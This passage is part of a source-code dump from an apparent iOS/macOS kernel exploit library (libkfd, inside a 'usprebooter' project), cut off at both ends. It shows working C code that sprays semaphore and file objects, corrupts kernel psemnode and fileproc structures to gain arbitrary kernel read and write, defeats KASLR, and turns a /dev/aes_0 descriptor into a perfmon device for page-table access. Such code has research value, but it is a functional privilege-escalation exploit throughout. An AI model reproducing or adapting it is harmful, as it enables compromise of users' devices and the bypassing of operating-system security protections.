kread_kqueue_workloop_ctl_h */ ================================================ FILE: usprebooter/libkfd/krkw/kread/kread_sem_open.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef kread_sem_open_h #define kread_sem_open_h const char* kread_sem_open_name = "kfd-posix-semaphore"; u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr); u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr); void kread_sem_open_init(struct kfd* kfd) { kfd->kread.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100; kfd->kread.krkw_object_size = sizeof(struct psemnode); kfd->kread.krkw_method_data_size = ((kfd->kread.krkw_maximum_id + 1) * (sizeof(i32))) + sizeof(struct psem_fdinfo); kfd->kread.krkw_method_data = malloc_bzero(kfd->kread.krkw_method_data_size); sem_unlink(kread_sem_open_name); i32 sem_fd = (i32)(usize)(sem_open(kread_sem_open_name, (O_CREAT | O_EXCL), (S_IRUSR | S_IWUSR), 0)); //assert(sem_fd > 0); i32* fds = (i32*)(kfd->kread.krkw_method_data); fds[kfd->kread.krkw_maximum_id] = sem_fd; struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); i32 callnum = PROC_INFO_CALL_PIDFDINFO; i32 pid = kfd->info.env.pid; u32 flavor = PROC_PIDFDPSEMINFO; u64 arg = sem_fd; u64 buffer = (u64)(sem_data); i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); } void kread_sem_open_allocate(struct kfd* kfd, u64 id) { i32 fd = (i32)(usize)(sem_open(kread_sem_open_name, 0, 0, 0)); assert(fd > 0); i32* fds = (i32*)(kfd->kread.krkw_method_data); fds[id] = fd; } bool kread_sem_open_search(struct kfd* kfd, u64 object_uaddr) { volatile struct psemnode* pnode = (volatile struct psemnode*)(object_uaddr); i32* fds = (i32*)(kfd->kread.krkw_method_data); struct psem_fdinfo* sem_data = (struct psem_fdinfo*)(&fds[kfd->kread.krkw_maximum_id + 1]); if ((pnode[0].pinfo > pac_mask) && (pnode[1].pinfo == pnode[0].pinfo) && (pnode[2].pinfo == pnode[0].pinfo) && (pnode[3].pinfo == pnode[0].pinfo) && (pnode[0].padding == 0) && (pnode[1].padding == 0) && (pnode[2].padding == 0) && (pnode[3].padding == 0)) { for (u64 object_id = kfd->kread.krkw_searched_id; object_id < kfd->kread.krkw_allocated_id; object_id++) { struct psem_fdinfo data = {}; i32 callnum = PROC_INFO_CALL_PIDFDINFO; i32 pid = kfd->info.env.pid; u32 flavor = PROC_PIDFDPSEMINFO; u64 arg = fds[object_id]; u64 buffer = (u64)(&data); i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); const u64 shift_amount = 4; pnode[0].pinfo += shift_amount; assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); pnode[0].pinfo -= shift_amount; if (!memcmp(&data.pseminfo.psem_name[0], &sem_data->pseminfo.psem_name[shift_amount], 16)) { kfd->kread.krkw_object_id = object_id; return true; } } /* * False alarm: it wasn't one of our psemmode objects. */ print_warning("failed to find modified psem_name sentinel"); } return false; } void kread_sem_open_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) { kread_from_method(u64, kread_sem_open_kread_u64); } void kread_sem_open_find_proc(struct kfd* kfd) { u64 pseminfo_kaddr = ((volatile struct psemnode*)(kfd->kread.krkw_object_uaddr))->pinfo; u64 semaphore_kaddr = kget_u64(pseminfo__psem_semobject, pseminfo_kaddr); u64 task_kaddr = kget_u64(semaphore__owner, semaphore_kaddr); u64 proc_kaddr = task_kaddr - kfd_offset(proc__object_size); kfd->info.kaddr.kernel_proc = proc_kaddr; /* * Go backwards from the kernel_proc, which is the last proc in the list. */ while (true) { i32 pid = kget_u64(proc__p_pid, proc_kaddr); if (pid == kfd->info.env.pid) { kfd->info.kaddr.current_proc = proc_kaddr; break; } proc_kaddr = kget_u64(proc__p_list__le_prev, proc_kaddr); } } void kread_sem_open_deallocate(struct kfd* kfd, u64 id) { /* * Let kwrite_sem_open_deallocate() take care of * deallocating all the shared file descriptors. */ return; } void kread_sem_open_free(struct kfd* kfd) { /* * Let's null out the kread reference to the shared data buffer * because kwrite_sem_open_free() needs it and will free it. */ kfd->kread.krkw_method_data = NULL; } /* * 64-bit kread function. */ u64 kread_sem_open_kread_u64(struct kfd* kfd, u64 kaddr) { i32* fds = (i32*)(kfd->kread.krkw_method_data); i32 kread_fd = fds[kfd->kread.krkw_object_id]; u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; u64 old_pinfo = ((volatile struct psemnode*)(psemnode_uaddr))->pinfo; u64 new_pinfo = kaddr - kfd_offset(pseminfo__psem_uid); ((volatile struct psemnode*)(psemnode_uaddr))->pinfo = new_pinfo; struct psem_fdinfo data = {}; i32 callnum = PROC_INFO_CALL_PIDFDINFO; i32 pid = kfd->info.env.pid; u32 flavor = PROC_PIDFDPSEMINFO; u64 arg = kread_fd; u64 buffer = (u64)(&data); i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); ((volatile struct psemnode*)(psemnode_uaddr))->pinfo = old_pinfo; return *(u64*)(&data.pseminfo.psem_stat.vst_uid); } /* * 32-bit kread function that is guaranteed to not underflow a page, * i.e. those 4 bytes are the first 4 bytes read by the modified kernel pointer. */ u32 kread_sem_open_kread_u32(struct kfd* kfd, u64 kaddr) { i32* fds = (i32*)(kfd->kread.krkw_method_data); i32 kread_fd = fds[kfd->kread.krkw_object_id]; u64 psemnode_uaddr = kfd->kread.krkw_object_uaddr; u64 old_pinfo = ((volatile struct psemnode*)(psemnode_uaddr))->pinfo; u64 new_pinfo = kaddr - kfd_offset(pseminfo__psem_usecount); ((volatile struct psemnode*)(psemnode_uaddr))->pinfo = new_pinfo; struct psem_fdinfo data = {}; i32 callnum = PROC_INFO_CALL_PIDFDINFO; i32 pid = kfd->info.env.pid; u32 flavor = PROC_PIDFDPSEMINFO; u64 arg = kread_fd; u64 buffer = (u64)(&data); i32 buffersize = (i32)(sizeof(struct psem_fdinfo)); assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); ((volatile struct psemnode*)(psemnode_uaddr))->pinfo = old_pinfo; return *(u32*)(&data.pseminfo.psem_stat.vst_size); } #endif /* kread_sem_open_h */ ================================================ FILE: usprebooter/libkfd/krkw/kwrite/kwrite_dup.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef kwrite_dup_h #define kwrite_dup_h void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value); void kwrite_dup_init(struct kfd* kfd) { kfd->kwrite.krkw_maximum_id = kfd->info.env.maxfilesperproc - 100; kfd->kwrite.krkw_object_size = sizeof(struct fileproc); kfd->kwrite.krkw_method_data_size = ((kfd->kwrite.krkw_maximum_id + 1) * (sizeof(i32))); kfd->kwrite.krkw_method_data = malloc_bzero(kfd->kwrite.krkw_method_data_size); i32 kqueue_fd = kqueue(); assert(kqueue_fd > 0); i32* fds = (i32*)(kfd->kwrite.krkw_method_data); fds[kfd->kwrite.krkw_maximum_id] = kqueue_fd; } void kwrite_dup_allocate(struct kfd* kfd, u64 id) { i32* fds = (i32*)(kfd->kwrite.krkw_method_data); i32 kqueue_fd = fds[kfd->kwrite.krkw_maximum_id]; i32 fd = dup(kqueue_fd); assert(fd > 0); fds[id] = fd; } bool kwrite_dup_search(struct kfd* kfd, u64 object_uaddr) { volatile struct fileproc* fp = (volatile struct fileproc*)(object_uaddr); i32* fds = (i32*)(kfd->kwrite.krkw_method_data); if ((fp->fp_iocount == 1) && (fp->fp_vflags == 0) && (fp->fp_flags == 0) && (fp->fp_guard_attrs == 0) && (fp->fp_glob > ptr_mask) && (fp->fp_guard == 0)) { for (u64 object_id = kfd->kwrite.krkw_searched_id; object_id < kfd->kwrite.krkw_allocated_id; object_id++) { assert_bsd(fcntl(fds[object_id], F_SETFD, FD_CLOEXEC)); if (fp->fp_flags == 1) { kfd->kwrite.krkw_object_id = object_id; return true; } assert_bsd(fcntl(fds[object_id], F_SETFD, 0)); } /* * False alarm: it wasn't one of our fileproc objects. */ print_warning("failed to find modified fp_flags sentinel"); } return false; } void kwrite_dup_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) { kwrite_from_method(u64, kwrite_dup_kwrite_u64); } void kwrite_dup_find_proc(struct kfd* kfd) { /* * Assume that kread is responsible for that. */ return; } void kwrite_dup_deallocate(struct kfd* kfd, u64 id) { i32* fds = (i32*)(kfd->kwrite.krkw_method_data); assert_bsd(close(fds[id])); } void kwrite_dup_free(struct kfd* kfd) { kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_object_id); kwrite_dup_deallocate(kfd, kfd->kwrite.krkw_maximum_id); } /* * 64-bit kwrite function. */ void kwrite_dup_kwrite_u64(struct kfd* kfd, u64 kaddr, u64 new_value) { if (new_value == 0) { print_warning("cannot write 0"); return; } i32* fds = (i32*)(kfd->kwrite.krkw_method_data); i32 kwrite_fd = fds[kfd->kwrite.krkw_object_id]; u64 fileproc_uaddr = kfd->kwrite.krkw_object_uaddr; volatile struct fileproc* fp = (volatile struct fileproc*)(fileproc_uaddr); const bool allow_retry = true; do { u64 old_value = 0; kread((u64)(kfd), kaddr, &old_value, sizeof(old_value)); if (old_value == 0) { print_warning("cannot overwrite 0"); return; } if (old_value == new_value) { break; } u16 old_fp_guard_attrs = fp->fp_guard_attrs; u16 new_fp_guard_attrs = GUARD_REQUIRED; fp->fp_guard_attrs = new_fp_guard_attrs; u64 old_fp_guard = fp->fp_guard; u64 new_fp_guard = kaddr - kfd_offset(fileproc_guard__fpg_guard); fp->fp_guard = new_fp_guard; u64 guard = old_value; u32 guardflags = GUARD_REQUIRED; u64 nguard = new_value; u32 nguardflags = GUARD_REQUIRED; if (allow_retry) { syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL); } else { assert_bsd(syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL)); } fp->fp_guard_attrs = old_fp_guard_attrs; fp->fp_guard = old_fp_guard; } while (allow_retry); } #endif /* kwrite_dup_h */ ================================================ FILE: usprebooter/libkfd/krkw/kwrite/kwrite_sem_open.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef kwrite_sem_open_h #define kwrite_sem_open_h void kwrite_sem_open_init(struct kfd* kfd) { kfd->kwrite.krkw_maximum_id = kfd->kread.krkw_maximum_id; kfd->kwrite.krkw_object_size = sizeof(struct fileproc); kfd->kwrite.krkw_method_data_size = kfd->kread.krkw_method_data_size; kfd->kwrite.krkw_method_data = kfd->kread.krkw_method_data; } void kwrite_sem_open_allocate(struct kfd* kfd, u64 id) { if (id == 0) { id = kfd->kwrite.krkw_allocated_id = kfd->kread.krkw_allocated_id; if (kfd->kwrite.krkw_allocated_id == kfd->kwrite.krkw_maximum_id) { /* * Decrement krkw_allocated_id to account for increment in * krkw_helper_run_allocate(), because we return without allocating. */ kfd->kwrite.krkw_allocated_id--; return; } } /* * Just piggyback. */ kread_sem_open_allocate(kfd, id); } bool kwrite_sem_open_search(struct kfd* kfd, u64 object_uaddr) { /* * Just piggyback. */ return kwrite_dup_search(kfd, object_uaddr); } void kwrite_sem_open_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) { /* * Just piggyback. */ kwrite_dup_kwrite(kfd, uaddr, kaddr, size); } void kwrite_sem_open_find_proc(struct kfd* kfd) { /* * Assume that kread is responsible for that. */ return; } void kwrite_sem_open_deallocate(struct kfd* kfd, u64 id) { /* * Skip the deallocation for the kread object because we are * responsible for deallocating all the shared file descriptors. */ if (id != kfd->kread.krkw_object_id) { i32* fds = (i32*)(kfd->kwrite.krkw_method_data); assert_bsd(close(fds[id])); } } void kwrite_sem_open_free(struct kfd* kfd) { /* * Note that we are responsible to deallocate the kread object, but we must * discard its object id because of the check in kwrite_sem_open_deallocate(). */ u64 kread_id = kfd->kread.krkw_object_id; kfd->kread.krkw_object_id = (-1); kwrite_sem_open_deallocate(kfd, kread_id); kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_object_id); kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_maximum_id); } #endif /* kwrite_sem_open_h */ ================================================ FILE: usprebooter/libkfd/krkw.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef krkw_h #define krkw_h #define kread_from_method(type, method) \ do { \ volatile type* type_base = (volatile type*)(uaddr); \ u64 type_size = ((size) / (sizeof(type))); \ for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ type type_value = method(kfd, kaddr + (type_offset * sizeof(type))); \ type_base[type_offset] = type_value; \ } \ } while (0) #include "krkw/kread/kread_kqueue_workloop_ctl.h" #include "krkw/kread/kread_sem_open.h" #define kwrite_from_method(type, method) \ do { \ volatile type* type_base = (volatile type*)(uaddr); \ u64 type_size = ((size) / (sizeof(type))); \ for (u64 type_offset = 0; type_offset < type_size; type_offset++) { \ type type_value = type_base[type_offset]; \ method(kfd, kaddr + (type_offset * sizeof(type)), type_value); \ } \ } while (0) #include "krkw/kwrite/kwrite_dup.h" #include "krkw/kwrite/kwrite_sem_open.h" // Forward declarations for helper functions. void krkw_helper_init(struct kfd* kfd, struct krkw* krkw); void krkw_helper_grab_free_pages(struct kfd* kfd); void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_free(struct kfd* kfd, struct krkw* krkw); #define kread_method_case(method) \ case method: { \ const char* method_name = #method; \ print_string(method_name); \ kfd->kread.krkw_method_ops.init = method##_init; \ kfd->kread.krkw_method_ops.allocate = method##_allocate; \ kfd->kread.krkw_method_ops.search = method##_search; \ kfd->kread.krkw_method_ops.kread = method##_kread; \ kfd->kread.krkw_method_ops.kwrite = NULL; \ kfd->kread.krkw_method_ops.find_proc = method##_find_proc; \ kfd->kread.krkw_method_ops.deallocate = method##_deallocate; \ kfd->kread.krkw_method_ops.free = method##_free; \ break; \ } #define kwrite_method_case(method) \ case method: { \ const char* method_name = #method; \ print_string(method_name); \ kfd->kwrite.krkw_method_ops.init = method##_init; \ kfd->kwrite.krkw_method_ops.allocate = method##_allocate; \ kfd->kwrite.krkw_method_ops.search = method##_search; \ kfd->kwrite.krkw_method_ops.kread = NULL; \ kfd->kwrite.krkw_method_ops.kwrite = method##_kwrite; \ kfd->kwrite.krkw_method_ops.find_proc = method##_find_proc; \ kfd->kwrite.krkw_method_ops.deallocate = method##_deallocate; \ kfd->kwrite.krkw_method_ops.free = method##_free; \ break; \ } void krkw_init(struct kfd* kfd, u64 kread_method, u64 kwrite_method) { switch (kread_method) { kread_method_case(kread_kqueue_workloop_ctl) kread_method_case(kread_sem_open) } switch (kwrite_method) { kwrite_method_case(kwrite_dup) kwrite_method_case(kwrite_sem_open) } krkw_helper_init(kfd, &kfd->kread); krkw_helper_init(kfd, &kfd->kwrite); } void krkw_run(struct kfd* kfd) { krkw_helper_grab_free_pages(kfd); timer_start(); krkw_helper_run_allocate(kfd, &kfd->kread); krkw_helper_run_allocate(kfd, &kfd->kwrite); krkw_helper_run_deallocate(kfd, &kfd->kread); krkw_helper_run_deallocate(kfd, &kfd->kwrite); timer_end(); } void krkw_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) { kfd->kread.krkw_method_ops.kread(kfd, kaddr, uaddr, size); } void krkw_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) { kfd->kwrite.krkw_method_ops.kwrite(kfd, uaddr, kaddr, size); } void krkw_free(struct kfd* kfd) { krkw_helper_free(kfd, &kfd->kread); krkw_helper_free(kfd, &kfd->kwrite); } /* * Helper krkw functions. */ void krkw_helper_init(struct kfd* kfd, struct krkw* krkw) { krkw->krkw_method_ops.init(kfd); } void krkw_helper_grab_free_pages(struct kfd* kfd) { timer_start(); const u64 copy_pages = (kfd->info.copy.size / pages(1)); const u64 grabbed_puaf_pages_goal = (kfd->puaf.number_of_puaf_pages / 4); const u64 grabbed_free_pages_max = 400000; for (u64 grabbed_free_pages = copy_pages; grabbed_free_pages < grabbed_free_pages_max; grabbed_free_pages += copy_pages) { assert_mach(vm_copy(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size, kfd->info.copy.dst_uaddr)); u64 grabbed_puaf_pages = 0; for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; if (!memcmp(info_copy_sentinel, (void*)(puaf_page_uaddr), info_copy_sentinel_size)) { if (++grabbed_puaf_pages == grabbed_puaf_pages_goal) { print_u64(grabbed_free_pages); timer_end(); return; } } } } print_warning("failed to grab free pages goal"); } void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw) { timer_start(); const u64 batch_size = (pages(1) / krkw->krkw_object_size); while (true) { /* * Spray a batch of objects, but stop if the maximum id has been reached. */ bool maximum_reached = false; for (u64 i = 0; i < batch_size; i++) { if (krkw->krkw_allocated_id == krkw->krkw_maximum_id) { maximum_reached = true; break; } krkw->krkw_method_ops.allocate(kfd, krkw->krkw_allocated_id); krkw->krkw_allocated_id++; } /* * Search the puaf pages for the last batch of objects. * * Note that we make the following assumptions: * - All objects have a 64-bit alignment. * - All objects can be found within 1/16th of a page. * - All objects have a size smaller than 15/16th of a page. */ for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; u64 stop_uaddr = puaf_page_uaddr + (pages(1) / 16); for (u64 object_uaddr = puaf_page_uaddr; object_uaddr < stop_uaddr; object_uaddr += sizeof(u64)) { if (krkw->krkw_method_ops.search(kfd, object_uaddr)) { krkw->krkw_searched_id = krkw->krkw_object_id; krkw->krkw_object_uaddr = object_uaddr; goto loop_break; } } } krkw->krkw_searched_id = krkw->krkw_allocated_id; if (maximum_reached) { loop_break: break; } } timer_end(); const char* krkw_type = (krkw->krkw_method_ops.kread) ? "kread" : "kwrite"; if (!krkw->krkw_object_uaddr) { for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; print_buffer(puaf_page_uaddr, 64); break; } assert_false(krkw_type); } print_message( "%s ---> object_id = %llu, object_uaddr = 0x%016llx, object_size = %llu, allocated_id = %llu/%llu, batch_size = %llu", krkw_type, krkw->krkw_object_id, krkw->krkw_object_uaddr, krkw->krkw_object_size, krkw->krkw_allocated_id, krkw->krkw_maximum_id, batch_size ); assert(krkw->krkw_object_uaddr); print_buffer(krkw->krkw_object_uaddr, krkw->krkw_object_size); if (!kfd->info.kaddr.current_proc) { krkw->krkw_method_ops.find_proc(kfd); } } void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw) { timer_start(); for (u64 id = 0; id < krkw->krkw_allocated_id; id++) { if (id == krkw->krkw_object_id) { continue; } krkw->krkw_method_ops.deallocate(kfd, id); } timer_end(); } void krkw_helper_free(struct kfd* kfd, struct krkw* krkw) { krkw->krkw_method_ops.free(kfd); if (krkw->krkw_method_data) { bzero_free(krkw->krkw_method_data, krkw->krkw_method_data_size); } } #endif /* krkw_h */ ================================================ FILE: usprebooter/libkfd/perf.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef perf_h #define perf_h // Forward declarations for helper functions. u64 phystokv(struct kfd* kfd, u64 pa); u64 vtophys(struct kfd* kfd, u64 va); void perf_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) { assert((size != 0) && (size <= UINT16_MAX)); assert(kfd->perf.shared_page.uaddr); assert(kfd->perf.shared_page.kaddr); volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr); *config = (volatile struct perfmon_config){}; config->pc_spec.ps_events = (struct perfmon_event*)(kaddr); config->pc_spec.ps_event_count = (u16)(size); struct perfmon_spec spec_buffer = {}; spec_buffer.ps_events = (struct perfmon_event*)(uaddr); spec_buffer.ps_event_count = (u16)(size); assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_SPECIFY, &spec_buffer)); *config = (volatile struct perfmon_config){}; } void perf_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) { assert((size != 0) && ((size % sizeof(u64)) == 0)); assert(kfd->perf.shared_page.uaddr); assert(kfd->perf.shared_page.kaddr); volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr); volatile struct perfmon_source* source = (volatile struct perfmon_source*)(kfd->perf.shared_page.uaddr + sizeof(*config)); volatile struct perfmon_event* event = (volatile struct perfmon_event*)(kfd->perf.shared_page.uaddr + sizeof(*config) + sizeof(*source)); u64 source_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config); u64 event_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config) + sizeof(*source); for (u64 i = 0; i < (size / sizeof(u64)); i++) { *config = (volatile struct perfmon_config){}; *source = (volatile struct perfmon_source){}; *event = (volatile struct perfmon_event){}; config->pc_source = (struct perfmon_source*)(source_kaddr); config->pc_spec.ps_events = (struct perfmon_event*)(event_kaddr); config->pc_counters = (struct perfmon_counter*)(kaddr + (i * sizeof(u64))); source->ps_layout.pl_counter_count = 1; source->ps_layout.pl_fixed_offset = 1; struct perfmon_event event_buffer = {}; u64 kvalue = ((volatile u64*)(uaddr))[i]; event_buffer.pe_number = kvalue; assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_ADD_EVENT, &event_buffer)); } *config = (volatile struct perfmon_config){}; *source = (volatile struct perfmon_source){}; *event = (volatile struct perfmon_event){}; } void perf_init(struct kfd* kfd) { /* * Allocate a page that will be used as a shared buffer between user space and kernel space. */ vm_address_t shared_page_address = 0; vm_size_t shared_page_size = pages(1); assert_mach(vm_allocate(mach_task_self(), &shared_page_address, shared_page_size, VM_FLAGS_ANYWHERE)); memset((void*)(shared_page_address), 0, shared_page_size); kfd->perf.shared_page.uaddr = shared_page_address; kfd->perf.shared_page.size = shared_page_size; /* * Open a "/dev/aes_0" descriptor, then use it to find the kernel slide. */ kfd->perf.dev.fd = open("/dev/aes_0", O_RDWR); assert(kfd->perf.dev.fd > 0); } void perf_run(struct kfd* kfd) { assert(kfd->info.kaddr.current_proc); u64 fd_ofiles = kget_u64(proc__p_fd__fd_ofiles, kfd->info.kaddr.current_proc); u64 fileproc_kaddr = unsign_kaddr(fd_ofiles) + (kfd->perf.dev.fd * sizeof(u64)); u64 fileproc = 0; kread((u64)(kfd), fileproc_kaddr, &fileproc, sizeof(fileproc)); u64 fp_glob_kaddr = fileproc + offsetof(struct fileproc, fp_glob); u64 fp_glob = 0; kread((u64)(kfd), fp_glob_kaddr, &fp_glob, sizeof(fp_glob)); u64 fg_ops = kget_u64(fileglob__fg_ops, unsign_kaddr(fp_glob)); u64 fo_kqfilter = kget_u64(fileops__fo_kqfilter, unsign_kaddr(fg_ops)); u64 vn_kqfilter = unsign_kaddr(fo_kqfilter); u64 kernel_slide = vn_kqfilter - kfd_offset(kernelcache__vn_kqfilter); u64 kernel_base = kfd_offset(kernelcache__kernel_base) + kernel_slide; kfd->perf.kernel_slide = kernel_slide; print_x64(kfd->perf.kernel_slide); if (kfd->kread.krkw_method_ops.kread == kread_sem_open_kread) { u32 mh_header[2] = {}; mh_header[0] = kread_sem_open_kread_u32(kfd, kernel_base); mh_header[1] = kread_sem_open_kread_u32(kfd, kernel_base + 4); assert(mh_header[0] == 0xfeedfacf); assert(mh_header[1] == 0x0100000c); } /* * Corrupt the "/dev/aes_0" descriptor into a "/dev/perfmon_core" descriptor. */ u64 fg_data = kget_u64(fileglob__fg_data, unsign_kaddr(fp_glob)); u64 v_specinfo = kget_u64(vnode__v_un__vu_specinfo, unsign_kaddr(fg_data)); kfd->perf.dev.si_rdev_kaddr = unsign_kaddr(v_specinfo) + kfd_offset(specinfo__si_rdev); kread((u64)(kfd), kfd->perf.dev.si_rdev_kaddr, &kfd->perf.dev.si_rdev_buffer, sizeof(kfd->perf.dev.si_rdev_buffer)); u64 cdevsw_kaddr = kfd_offset(kernelcache__cdevsw) + kernel_slide; u64 perfmon_dev_open_kaddr = kfd_offset(kernelcache__perfmon_dev_open) + kernel_slide; u64 cdevsw[14] = {}; u32 dev_new_major = 0; for (u64 dmaj = 0; dmaj < 64; dmaj++) { u64 kaddr = cdevsw_kaddr + (dmaj * sizeof(cdevsw)); kread((u64)(kfd), kaddr, &cdevsw, sizeof(cdevsw)); u64 d_open = unsign_kaddr(cdevsw[0]); if (d_open == perfmon_dev_open_kaddr) { dev_new_major = (dmaj << 24); break; } } u32 new_si_rdev_buffer[2] = {}; new_si_rdev_buffer[0] = dev_new_major; new_si_rdev_buffer[1] = kfd->perf.dev.si_rdev_buffer[1] + 1; kwrite((u64)(kfd), &new_si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(new_si_rdev_buffer)); /* * Find ptov_table, gVirtBase, gPhysBase, gPhysSize, TTBR0 and TTBR1. */ u64 ptov_table_kaddr = kfd_offset(kernelcache__ptov_table) + kernel_slide; kread((u64)(kfd), ptov_table_kaddr, &kfd->perf.ptov_table, sizeof(kfd->perf.ptov_table)); u64 gVirtBase_kaddr = kfd_offset(kernelcache__gVirtBase) + kernel_slide; kread((u64)(kfd), gVirtBase_kaddr, &kfd->perf.gVirtBase, sizeof(kfd->perf.gVirtBase)); print_x64(kfd->perf.gVirtBase); u64 gPhysBase_kaddr = kfd_offset(kernelcache__gPhysBase) + kernel_slide; kread((u64)(kfd), gPhysBase_kaddr, &kfd->perf.gPhysBase, sizeof(kfd->perf.gPhysBase)); print_x64(kfd->perf.gPhysBase); u64 gPhysSize_kaddr = kfd_offset(kernelcache__gPhysSize) + kernel_slide; kread((u64)(kfd), gPhysSize_kaddr, &kfd->perf.gPhysSize, sizeof(kfd->perf.gPhysSize)); print_x64(kfd->perf.gPhysSize); assert(kfd->info.kaddr.current_pmap); kfd->perf.ttbr[0].va = kget_u64(pmap__tte, kfd->info.kaddr.current_pmap); kfd->perf.ttbr[0].pa = kget_u64(pmap__ttep, kfd->info.kaddr.current_pmap); assert(phystokv(kfd, kfd->perf.ttbr[0].pa) == kfd->perf.ttbr[0].va); assert(kfd->info.kaddr.kernel_pmap); kfd->perf.ttbr[1].va = kget_u64(pmap__tte, kfd->info.kaddr.kernel_pmap); kfd->perf.ttbr[1].pa = kget_u64(pmap__ttep, kfd->info.kaddr.kernel_pmap); assert(phystokv(kfd, kfd->perf.ttbr[1].pa) == kfd->perf.ttbr[1].va); /* * Find the shared page in kernel space. */ kfd->perf.shared_page.paddr = vtophys(kfd, kfd->perf.shared_page.uaddr); kfd->perf.shared_page.kaddr = phystokv(kfd, kfd->perf.shared_page.paddr); /* * Set up the perfmon device use for the master kread and kwrite: * - perfmon_devices[0][0].pmdv_config = kfd->perf.shared_page.kaddr * - perfmon_devices[0][0].pmdv_allocated = true */ struct perfmon_device perfmon_device = {}; u64 perfmon_device_kaddr = kfd_offset(kernelcache__perfmon_devices) + kernel_slide; u8* perfmon_device_uaddr = (u8*)(&perfmon_device); kread((u64)(kfd), perfmon_device_kaddr, &perfmon_device, sizeof(perfmon_device)); perfmon_device.pmdv_mutex[1] = (-1); perfmon_device.pmdv_config = (struct perfmon_config*)(kfd->perf.shared_page.kaddr); perfmon_device.pmdv_allocated = true; kwrite((u64)(kfd), perfmon_device_uaddr + 12, perfmon_device_kaddr + 12, sizeof(u64)); ((volatile u32*)(perfmon_device_uaddr))[4] = 0; kwrite((u64)(kfd), perfmon_device_uaddr + 16, perfmon_device_kaddr + 16, sizeof(u64)); ((volatile u32*)(perfmon_device_uaddr))[5] = 0; kwrite((u64)(kfd), perfmon_device_uaddr + 20, perfmon_device_kaddr + 20, sizeof(u64)); kwrite((u64)(kfd), perfmon_device_uaddr + 24, perfmon_device_kaddr + 24, sizeof(u64)); kwrite((u64)(kfd), perfmon_device_uaddr + 28, perfmon_device_kaddr + 28, sizeof(u64)); kfd->perf.saved_kread = kfd->kread.krkw_method_ops.kread; kfd->perf.saved_kwrite = kfd->kwrite.krkw_method_ops.kwrite; kfd->kread.krkw_method_ops.kread = perf_kread; kfd->kwrite.krkw_method_ops.kwrite = perf_kwrite; } void perf_free(struct kfd* kfd) { kfd->kread.krkw_method_ops.kread = kfd->perf.saved_kread; kfd->kwrite.krkw_method_ops.kwrite = kfd->perf.saved_kwrite; /* * Restore the "/dev/perfmon_core" descriptor back to the "/dev/aes_0" descriptor. * Then, close it and deallocate the shared page. * This leaves the first perfmon device "pmdv_allocated", which is fine. */ kwrite((u64)(kfd), &kfd->perf.dev.si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(kfd->perf.dev.si_rdev_buffer)); assert_bsd(close(kfd->perf.dev.fd)); assert_mach(vm_deallocate(mach_task_self(), kfd->perf.shared_page.uaddr, kfd->perf.shared_page.size)); } /* * Helper perf functions. */ u64 phystokv(struct kfd* kfd, u64 pa) { const u64 PTOV_TABLE_SIZE = 8; const u64 gVirtBase = kfd->perf.gVirtBase; const u64 gPhysBase = kfd->perf.gPhysBase; const u64 gPhysSize = kfd->perf.gPhysSize; const struct ptov_table_entry* ptov_table = &kfd->perf.ptov_table[0]; for (u64 i = 0; (i < PTOV_TABLE_SIZE) && (ptov_table[i].len != 0); i++) { if ((pa >= ptov_table[i].pa) && (pa < 